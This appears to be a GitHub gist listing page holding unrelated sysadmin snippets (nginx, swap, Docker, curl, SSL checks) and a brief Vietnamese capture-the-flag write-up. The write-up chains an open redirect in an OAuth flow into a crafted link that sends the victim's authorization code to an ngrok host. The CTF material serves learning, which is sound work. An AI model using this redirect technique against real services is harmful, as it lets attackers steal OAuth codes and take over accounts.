cat images.txt | awk 'match($2, /images\/(.*)$/, a){print $2 "\t" a[1]}' | while read url store_path; do
curl ${url} --create-dirs -o ${store_path}
done;What are you looking for?
The file name bootmgfw.efi to fix window shjt cannot boot?
This is here for you :D
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| location /.well-known/acme-challenge { | |
| alias /opt/letsencrypt/.acme-challenges; | |
| } | |
| if ($request_uri !~ "^/\.well-known/acme-challenge.*$"){ | |
| set $test notletencrypt; | |
| } | |
| if ($scheme != "https"){ | |
| set $test "${test}+notssl"; | |
| } | |
| if ($test = "notletencrypt+notssl") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Sudo | |
| sudo su | |
| # Check | |
| swapon -s | |
| # Create swap file | |
| fallocate -l 10G /swapfile && chmod 600 /swapfile # or dd if=/dev/zero of=/swapfile bs=1M count=2048 | |
| # Make swapfile a Linux-managed swap area |
I hereby claim:
- I am nampnq on github.
- I am nampnq (https://keybase.io/nampnq) on keybase.
- I have a public key whose fingerprint is 3748 6A9E C7E0 4AC4 FBF0 05E0 3A58 1A19 1373 277E
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Source: http://stackoverflow.com/a/25077676/1798281 | |
| <script> var sslCertTrusted = false; </script> | |
| <script src="https://example.com/ssltest.js"></script> | |
| <script> | |
| if (!sslCertTrusted) | |
| { | |
| alert('Sorry, you need to install the certificate first.'); | |
| window.location('http://example.com/cert_install_instructions/'); | |
| } | |
| else |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| docker images -q -a | xargs --no-run-if-empty docker rmi |
Mình viết sơ qua các steps mình làm
- Tác giả hint là open-redirect
- Mình có coi qua rồi, khi nhấn vào report chưa login nó sẽ chuyển sang page login, có params return=report.php
- search Open Redirect Fuzz List
- Thử vài cái thấy
\/google.comok - làm cái đường link để report
http://sadpen.ctf.yeuchimse.com/oauth.php?client_id=42&type=code&redirect_uri=http%3A%2F%2Fsadbook.ctf.yeuchimse.com%2Foauth%2Fcallback.php%2F..%2F..%2Flogin.php%3Futm_client%3D113.180.103.214%26return%3D%5C%2Fc4264db7.ngrok.io - report cho tác giả
- lấy đc
code - vào đọc tâm sự
- Go to your project
$ docker run -it --rm `pwd`:/opt/app rust bash
- Build
$ apt update && apt install mingw-w64 -y